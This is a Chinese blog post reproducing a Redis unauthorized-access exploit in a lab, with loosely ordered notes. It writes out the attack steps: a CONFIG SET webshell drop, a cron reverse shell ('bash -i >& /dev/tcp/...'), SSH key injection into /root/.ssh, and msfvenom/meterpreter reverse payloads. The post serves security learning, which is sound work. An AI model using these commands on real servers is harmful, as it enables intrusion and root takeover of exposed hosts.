Redis未授权访问漏洞复现过程

于 2024-11-17 10:12:08 发布
阅读量981 收藏 15
点赞数 29
文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maogs/article/details/143828144
版权

CentOS安装redis

从官网https://redis.io/download/下载安装包

上传到/home/strix目录下

解压

tar -zxvf redis-7.2.3.tar.gz -C /usr/local

修改配置文件

vim redis.conf

daemonize no

改成

daemonize yes

下面一行必须改成 bind 0.0.0.0 或注释,否则只能在本机访问

bind 127.0.0.1

如果需要密码访问,取消requirepass的注释,在外网(比如阿里云)这个必须要配置!

requirepass yourpassword

编译

yum install gcc-c++ -y

make && make install

启动redis服务

redis-server redis.conf > redis.log 2>&1 &

netstat -an | grep 6379

设置别名

vim ~/.bashrc

alias redis='/usr/local/redis-7.2.3/src/redis-server /usr/local/redis-7.2.3/redis.conf'

alias rcli='/usr/local/redis-7.2.3/src/redis-cli'

source ~/.bashrc

使用redis启动服务

创建2个服务器

Redis server 192.168.23.135

Redis cli 192.168.23.136

关闭防火墙Close firewall

systemctl stop firewalld.service

systemctl disable firewalld.service

安装小皮面板

Centos安装脚本 yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.sh && sh install.sh

安装成功后

请用浏览器访问面板:

外网:http://119.3.119.253:9080/5EF6EA

内网:http://192.168.23.135:9080/5EF6EA

系统初始账号:admin

系统初始密码:ml8mqKulcl

官网:https://www.xp.cn

如果使用的是云服务器,请至安全组开放9080端口

如果使用ftp,请开放21以及30000-30050端口

您修改了面板程序,这是不允许的。

请进入服务器命令行输入xp查看修复方法

动态修改配置

config set:动态修改配置,重启以后失效

config set dir /www/admin/localhost_80/wwwroot

config set dbfilename redis.php

/usr/local/redis-7.2.3/src/redis-cli -h 192.168.23.135 -p 6379

Could not connect to Redis at 192.168.23.135:6379: Connection timed out

not connected> ping 192.168.23.135

firewall closed Could not connect to Redis

改redis版本

因192.168.23.136始终无法连接到192.168.23.135,修改配置后也不行,最终放弃,不知道哪里配置出了问题。2023年11月19号周日花了2个小时也没解决。就决定安装无涯老师装的版本,现在的环境先保留,等复现以后再来查看具体原因。

重新安装Redis

在192.168.23.139/上重新安装redis

cd /usr/local/soft/

wget https://download.redis.io/releases/redis-6.0.9.tar.gz

https://download.redis.io/releases/redis-6.0.9.tar.gz

yum -y install centos-release-scl

yum -y install devtoolset-9-gcc devtoolset-9-gcc-c++ devtoolset-9-binutils

scl enable devtoolset-9 bash

echo "source /opt/rh/devtoolset-9/enable" >>/etc/profile

protected-mode 没改我以为是注释掉的,改不改没关系。

建立反弹连接过程

关闭防火墙

systemctl stop firewalld.service

systemctl disable firewalld.service

/usr/local/soft/redis-6.0.9/src/redis-cli -h 192.168.23.143 -p 6379

vim /usr/local/soft/redis-6.0.9/redis.conf

http://192.168.23.143/redis.php

一句话木马

成功使用一句话木马建立反弹连接

命令含义

标准输入 (stdin) :代码为 0 ,使用 < 或

标准输出 (stdout):代码为 1 ,使用 > 或 >> ;

标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>

例:

netstat -an|grep 3306 >out.txt // 输出到文件

find / -name "test.py" 2>/dev/null // 过滤报错

0

bash 反弹连接

客户端

nc

readlink -f $(which nc)

一开始并未成功,对防火墙进行如下配置后成功建立反弹连接

firewall-cmd --zone=public --add-port=7777/tcp –permanent

systemctl status firewalld

systemctl start firewalld

firewall-cmd --zone=public --add-port=7777/tcp --permanent

firewall-cmd --reload

systemctl stop firewalld

msf

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.23.133

set lport 7777

run

使用如下命令生成payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.23.133 lport=7777 -i 5 -f exe -o test.exe

socat

socat TCP-LISTEN:7777 -192.168.23.133

使用定时任务

corn表达式

在线Cron表达式生成器

set x "\n* * * * * bash -i >& /dev/tcp/192.168.23.154/7777 0>&1\n"

config set dir /var/spool/cron/

config set dbfilename root

save

SSH key免密登录

set xxx "\n\n \n\n\n"

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC06QxL3nhJE+EouZTp7YI3abMmVgEufaJhBRIxSqFSNjZI6AfuutZmriHaXFIckPYiO2w5jr8dZFR2Z/pDRRCD02RIntrTixXS8kkfRqLK5mFA1vZ7ACHzFe9H5gvg+ElztdgDkhpH3oc1cF2+6/XHiRXwuGCeNzVHZWCaMVDfZT+8qYSrV4TEVWioFFMak/6AQQPfeLyv+bTBnXfKqszSTIqoqVVpQ85f/1ZPv+uVZJO78ukWtmSJrlxjsZc1ndQy7Brd5zSYpJe1/jFnUnCJws9guZ9u2Oo644FydDs0NvV6lS0S2soBr5OxsXfrXh8V9Zb6jy5EYqofXu3+yyBx root@localhost.localdomain

set xxx "\n\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC06QxL3nhJE+EouZTp7YI3abMmVgEufaJhBRIxSqFSNjZI6AfuutZmriHaXFIckPYiO2w5jr8dZFR2Z/pDRRCD02RIntrTixXS8kkfRqLK5mFA1vZ7ACHzFe9H5gvg+ElztdgDkhpH3oc1cF2+6/XHiRXwuGCeNzVHZWCaMVDfZT+8qYSrV4TEVWioFFMak/6AQQPfeLyv+bTBnXfKqszSTIqoqVVpQ85f/1ZPv+uVZJO78ukWtmSJrlxjsZc1ndQy7Brd5zSYpJe1/jFnUnCJws9guZ9u2Oo644FydDs0NvV6lS0S2soBr5OxsXfrXh8V9Zb6jy5EYqofXu3+yyBx root@localhost.localdomain\n\n\n"

config set dbfilename authorized_keys

save

config set dir /root/.ssh

ssh -i ./id_rsa root@192.168.23.143

ssh -i ./id_rsa root@192.168.23.143

加固

https://redis.io/docs/management/security/

Redis is designed to be accessed by trusted clients inside trusted environments. This means that usually it is not a good idea to expose the Redis instance directly to the internet or, in general, to an environment where untrusted clients can directly access the Redis TCP port or UNIX socket.

观浩
关注
redis保护模式的报错
sudsahdua的博客
10-18 782
1.首先得保证redis实在gcc环境下运行的 2.如果发现命令行中只能打印出大写在符号,那么长安【A】就好,或者shift+[A]试试 3.mini安装Linux发现连不了网,要在配置文件中启动网关,并且设置自动分配IP地址,如果手动配置IP地址的话开门,可能还是连不上 4.java连接Redis出现错误, --------(错误原因:1>Linux防火墙默认是开启的 2>Redis默认是保护模式(绑定到127.0.0.1)) 解决方法: 关闭防火墙同时关闭Redis的保护模式 按照java的
Redis未授权访问漏洞复现与利用
Forget_liu的博客
06-07 2974
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
redis未授权漏洞复现
weixin_64972949的博客
05-08 937
Redis,英文全称是Remote Dictionary Server(远程字典服务),是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。与MySQL数据库不同的是,Redis的数据是存在内存中的。它的读写速度非常快,每秒可以处理超过10万次读写操作。因此redis被广泛应用于缓存,另外,Redis也经常用来做分布式锁。除此之外,Redis支持事务、持久化、LUA 脚本、LRU 驱动事件、多种集群方案。
redis漏洞修复:(CNVD-2019-21763)
大新新大浩浩的博客
09-22 1231
redis漏洞修复:(CNVD-2019-21763) docker形式运行的redis的防火墙规则配置
CRMEB知识付费系统安装搭建【常见问题-13.redis密码】
CRMEB小程序商城的博客
06-18 4487
redis密码没有设置 如图: 目录切换到知识付费项目根目录,点击终端 打开终端后切到知识付费根目录 第一步:检查redis是否启动 命令:redis-cli 第二步:检查redis密码 命令:keys * 第三步:密码 这是没有设置redis密码,项目中也可不用设置密码 第四步:设置redis密码 如 将redis密码设置成1234567 命令:config set requirepass 1234567 第五步:检查密码是否设置成功 第六步:项目配置文件设置redis密码 更改成redis
解决 Redis7.0远程连接报错:WRONGPASS invalid username-password pair or user is disabled.
SSSSSSSWWA的博客
05-09 1万+
再设置bind 0.0.0.0 和protected-mode no以及密码之后,我通过本地工具远程连接服务器的redis始终连接不上,并且能够确认服务器上的redis是正常运行,本地也能telnt通服务器的6379端口,翻遍很多资料后发现:redis7.0升级了一个东西:当设置密码后,用户名不再是root,会有一个默认的用户名:default,把用户名改成default 成功解决问题。
Redis未授权访问漏洞复现
xunhuanmao的博客
09-22 2689
Redis未授权访问漏洞的环境搭建以及利用方式。
漏洞复现Redis未授权访问
m0_56190544的博客
09-13 2887
本文详细介绍了redis未授权访问漏洞的原理以及利用方法,供大家参考学习
redis未授权访问漏洞复现
findou
04-09 527
Redis是一个开源的key-value内存中的数据结构存储系统,可以用作缓存,或数据库redis因为配置不当可以导致未授权访问redis的默认端口是6379,并且redis默认配置没有密码认证,如果reids服务暴露在公网上会导致攻击者在未授权的情况下访问redis。如果redis以root身份运行,攻击者可以给root账号写入ssh公钥文件,通过ssh登录目标主机。下面是redis未授权访...
Redis未授权访问漏洞搭建复现
m0_58595840的博客
01-05 2939
Redis未授权访问漏洞利用方式总结(含靶场搭建)
WRONGPASS invalid username-password pair or user is disabled.
热门推荐
LonelinessWorld的博客
11-04 3万+
1:旧版本的使用方式,默认用户。兼容旧版本Redis的支持 AUTH 2:新方式,还需要验证用户名 AUTH auth填密码,密码是redis.conf配置的
Redis未授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9765
redis未授权访问漏洞
redis认证密码配置
Majker的专栏
09-27 581
redis window 版本解压后目录如下: 最简单的启动方式是直接双击redis-server.exe 就可以运行了 设置密码,打开配置文件(后缀为conf的文件),要注意的是这两个都是配置文件,记住你改的是哪一个,不放心的可以两个都改 在配置文件内找到#requirepass foobared,改成requirepass 密码。 例如 我将密码改成了test123, 内容如...
Redis未授权漏洞复现,利用其实现的挖矿蠕虫脚本分析
qq_53689523的博客
05-05 1001
Redis未授权漏洞复现 挖矿蠕虫脚本分析 恶意代码分析实例
Redis】之密码设置和验证
王廷云的博客
10-09 6587
一、查看现有的 Redis 密码: 127.0.0.1:6379> config get requirepass 1) "requirepass" 2) "" 二、设置 Redis 密码: # 设置密码 127.0.0.1:6379> config set requirepass 123456 OK # 查看结果 127.0.0.1:6379> config get requirepass 1) "requirepass" 2) "123456" 三、Redis 客户端使用密码验证
redis漏洞复现
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
03-24 2259
目录 redis准备 启动redis服务器 redis漏洞利用 写入webshell 计划任务反弹shell 写入公钥远程连接 主从复制RCE(Linux) 主从同步RCE漏洞复现 Windows自启动 redis密码暴力破解 由于最近github的问题,已备好 资源包 提取码:ks18 redis准备 Linux 安装: https://redis.io/download tar xzf redis-6.0.1.tar.gz cd redis-6.0.1...
Redis 未授权访问 CNNVD-201511-230 漏洞复现
Senimo
05-03 2485
CNNVD-201511-230 Redis 未授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。Redis 中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序
Internal Server ErrorWRONGPASS invalid username-password pair or user is disabled.
qq_42299593的博客
10-07 2017
Internal Server ErrorWRONGPASS invalid username-password pair or user is disabled.
漏洞复现Redis未授权
最新发布
过期的秋刀鱼
11-05 313
由于Redis存在未授权访问漏洞,所以无需账号密码就可以在我们的Redis目录下去远程控制靶机的Redis数据库,但是我们希望不仅仅是可以操作对方的Redis数据库,想提权去控制服务器,比较容易想到的就是想办法写个反弹shell,让靶机来连接我们,如果可以成功反弹,我们就可以提权。但是写计划任务是需要在计划任务的目录。4、使用Redis的set命令,往持久化目录文件里写一个键值对(这是set命令的格式要求,必须写键值对),键随便起,我起的是saury,值就为反弹shell的命令。
fastbot 字节
09-18
fastbot 是字节跳动旗下的一个智能助手,在2021年推出。它具有多项功能,可以为用户提供语音交互、信息搜索、日程管理、天气查询等等服务。 首先,fastbot 的语音交互功能非常强大。它可以听懂用户的语音指令,并通过智能算法进行解析和理解。用户可以通过语音的方式与fastbot 进行对话,非常方便。 其次,fastbot 可以进行信息搜索。用户可以向fastbot 提出问题或者搜索请求,fastbot 会通过搜索引擎或者自有数据库快速找到答案并反馈给用户。这对于用户获取信息非常便捷。 此外,fastbot 还具备日程管理功能。用户可以在fastbot 中设置提醒事项、安排日程,fastbot 会在事项发生之前提醒用户,帮助用户合理安排时间。 最后,fastbot 还可以查询天气。用户可以询问fastbot当天或者未来几天的天气情况,fastbot 会通过调用天气接口提供详细的天气预报,帮助用户合理出行。 总而言之,fastbot 字节是一个功能强大的智能助手,它通过语音交互、信息搜索、日程管理和天气查询等多项功能,可以提供便捷的服务,帮助用户更高效地处理各种事务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值